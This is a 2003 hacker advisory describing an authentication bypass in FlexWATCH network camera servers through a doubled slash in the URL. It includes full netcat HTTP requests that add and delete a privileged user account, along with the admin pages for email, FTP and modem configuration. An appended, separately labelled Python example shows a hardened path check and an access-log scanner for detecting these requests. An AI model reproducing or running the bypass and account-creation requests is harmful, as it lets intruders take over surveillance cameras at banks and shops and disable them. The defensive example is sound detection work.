------------------ u0xa ------------------------
Author: SLAIZER
mail: slaizer[at]phreaker.net
Date: Sun/Oct/26/2003
-------"Another way of seeing the things"--------
-------------------------------------------------

Unauthorized access vulnerability in FlexWATCH camera server
-----------------------------------------------------------

Vendor:
-------
·SEYEON Technology
·FlexWATCH Network Video Server
Url: http://www.flexwatch.com/
Mail: sytech@seyeon.co.kr

Product:
--------
All versions of the web-based configuration utility. I tested on SYS_MODEL = 132.

FlexWATCH is a camera server that centralizes camera management under a web
administration interface. It is very frequently used by security companies,
banks, parks and shopping centres.

Description :
-------------

[Necora@eviluser]$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80
HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs          <--- :)
Date: Sun Oct 26 02:15:07 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://victim/index.htm
Age: 0

*First: By default you can read the source of the index page and see that:
Many systems use this user and password, but that isn't important.
I found this:

------------u0xa-----------
  }
  function adminTool(){
    window.open("admin/aindex.htm","aindex","width=790,height=430,status=yes,resizable");
  }
  function select_sample()
------------u0xa-----------

Url: admin/aindex.htm is a web-based configuration page.
*I read more source pages, and see:

-----------u0xa------------
-----------u0xa------------

ummMm I want to read stream.jar:

[Necora@eviluser]$ jar xf stream.jar
-
META-INF/
META-INF/MANIFEST.MF
PrintfFormat$ConversionSpecification.class
CMsg.class
FInfo.class
StreamApplet.class
ImgCan.class
IMsg.class
JHCompr.class
JHEncry.class
JHManda.class
JHStand.class
LoginDlg.class        <---- (C:
MIMEBase64.class      <--- old friend :)
CgiQueryInfo.class
PrintfFormat.class
QueryMng.class
Semaphore.class
SingleCgi.class       <----- For now any cgi-url
StrCan.class
StreamCgi.class       <----- For now any cgi-url
StreamSocket.class
StreamThread.class
TCBack.class
Timer.class
-

·It's enough to know how the system works: authorization, cgi, crypt...
---------------------------

*Second: see http://victim/live.html and find this:

------------u0xa------------
------------u0xa------------

This contains info from the system:

//-- Model Information
SYS_MODEL = 132;
KERNEL_MAJORVER = 2;
KERNEL_MINORVER = 2;
IS_OEM = 0;
MODEL_NAME = "FLEXWATCH";
//-- For Administration
IS_ISDN = 0;
IS_LEASED = 1;
IS_AUDIO = 1;
IS_RTC = 1;
IS_RTC = "SAMSUNG";
//-- For Application
COUNT_CAM = 6;
COUNT_DI = 6;
COUNT_DO = 6;
VIDEO_FORMAT = 2;
TOTAL_FORMAT = 0x0007;
IS_PTZ = 1;
var CAM_NAME = new Array (6);
CAM_NAME[1] = "Office1";
CAM_NAME[2] = "Office2";
CAM_NAME[3] = "Office3";
CAM_NAME[4] = "4";
CAM_NAME[5] = "5";
CAM_NAME[6] = "6";
var PTZ_INSTALL = new Array (6);
PTZ_INSTALL[1] = 51;
PTZ_INSTALL[2] = 51;
PTZ_INSTALL[3] = 0;
PTZ_INSTALL[4] = 51;
PTZ_INSTALL[5] = 0;
PTZ_INSTALL[6] = 0;
-----------------------

*Some time ago I read about a security vulnerability in Boa: how to obtain access to a privileged directory with '//'.
Example: http://victim//privileged.html <--- ok?

*The camera access url:
------------------------
http://victim//app/sample/ab1.html

Wow! First access granted! Now you are identified in the java application. But... why search more there?
If we can play with the administration site, let's try:

http://victim//admin/aindex.htm <---- Interesting....

Now it's very easy :D

·Add a user to view cameras:
------------------------------
http://victim//admin/asp/adduser.asp <---- Form
[Necora@eviluser]$ nc victim 80
POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim//admin/asp/adduser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache

RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123&passconf=root123&group=POWER_USER&enabled=on&ok=OK
\n\n

**********************************************************************
-Wow! New user added: user=slaizer password=root123 group=POWER_USER*
**********************************************************************

*Note: Different groups exist for adding a user: guest, User and Power_User.
By default only the guest group can access remotely; you change this in:
http://victim//admin/asp/chglimit.asp

·How to delete a user:
------------------
http://victim//admin/asp/deluser.asp

[Necora@eviluser]$ nc victim 80
POST /goform/DeleteUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim//admin/asp/deluser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 90
Pragma: no-cache

RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&ok=OK
\n\n

**********************
-User slaizer deleted*
**********************

------------------------------------------------
Now you have access to watch all cameras :-D !
You can also reboot, edit the configuration...
http://victim/app/sample/ab1.html
-Login=slaizer password=root123-
________________________________________________

Examples :
·Configure the e-mail address the config is sent to:
http://victim//admin/fset/fset_email.htm
·Configure FTP to send an "evil-config" trojan cgi/asp conf.. blah blah:
http://victim//admin/fset/fset_ftp.htm
·Edit the modem configuration, for phreakers :)
http://victim//admin/fset/fset_modem.htm
·Change camera names xD
Camera1=xD Camera2=rules! Camera3=AznarSucks!
http://victim//admin/aindex.htm

Possible solutions :
--------------------
·Activate the firewall to admit connections only from the clients we want.
·Do not trust authentication performed on the client side (javascript...).
·SEYEON should invest in security... a thief could use this to deactivate the cameras during a robbery...

************************
Greetz! :
:: gyorgyo :: overpower :: IsAhT :: phiber :: IaM :: zapper :: dreyer :: kanutron :: Makensi :: TaYoKeN :: plAnadeCu :: AzTaGo :: gordenai ::
For aLL : #boinasnegras #ngsec #drakulines #rmosc \\ Irc-Hispano \\
************************

*******************************
*Sorry for orthographic errors*
*******************************
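Added example (written for this edit, not code from the advisory or from SEYEON): the literal prefix check that a doubled leading slash slips past, the canonicalising check that closes it, and a scanner that runs the same comparison over constructed access-log lines to flag bypass attempts and the /goform/AddUser and /goform/DeleteUser POSTs shown above. It assumes the server protects /admin/ and /app/ by a raw prefix match, which the advisory implies but does not show, and goes beyond the page by also handling percent-encoding and dot segments.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed for this example: prefixes the advisory reaches with a doubled
# leading slash, and the form handlers its POST requests use to add/delete users.
PROTECTED_PREFIXES = ("/admin/", "/app/")
ACCOUNT_HANDLERS = ("/goform/AddUser", "/goform/DeleteUser")

def is_protected_naive(path):
    """Literal prefix match on the raw request path: '//admin/' slips past."""
    return path.startswith(PROTECTED_PREFIXES)

def canonical(path):
    """Drop the query, percent-decode, collapse slashes, resolve '.' and '..'."""
    path = unquote(path.split("?", 1)[0])
    # lstrip first: posixpath.normpath deliberately keeps exactly two leading '/'
    return posixpath.normpath("/" + path.lstrip("/"))

def is_protected(path):
    """Hardened check: decide on the canonical path, never the raw one."""
    c = canonical(path)
    return any(c == p.rstrip("/") or c.startswith(p) for p in PROTECTED_PREFIXES)

# Common Log Format fields used below; the sample lines are constructed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

SAMPLE_LOG = """\
10.0.0.5 - - [26/Oct/2003:02:15:07 +0100] "GET /index.htm HTTP/1.0" 200 1822
10.0.0.5 - - [26/Oct/2003:02:16:11 +0100] "GET /admin/aindex.htm HTTP/1.0" 401 0
10.0.0.5 - - [26/Oct/2003:02:16:40 +0100] "GET //admin/aindex.htm HTTP/1.0" 200 5120
10.0.0.5 - - [26/Oct/2003:02:17:02 +0100] "POST /goform/AddUser HTTP/1.0" 302 0
10.0.0.9 - - [26/Oct/2003:02:18:30 +0100] "GET /app/sample/ab1.html HTTP/1.0" 401 0
""".splitlines()

def scan_log(lines):
    """Return (ip, reason, target) for requests a defender should review."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m["ip"], m["target"]
        # The two checks disagree exactly when a non-canonical URL reaches a protected path.
        if is_protected(target) and not is_protected_naive(target):
            findings.append((ip, "protected path reached via non-canonical URL", target))
        if m["method"] == "POST" and canonical(target) in ACCOUNT_HANDLERS:
            findings.append((ip, "account change through goform handler", target))
    return findings
```

Running scan_log(SAMPLE_LOG) reports the //admin/aindex.htm request and the AddUser POST and stays silent on the properly denied requests.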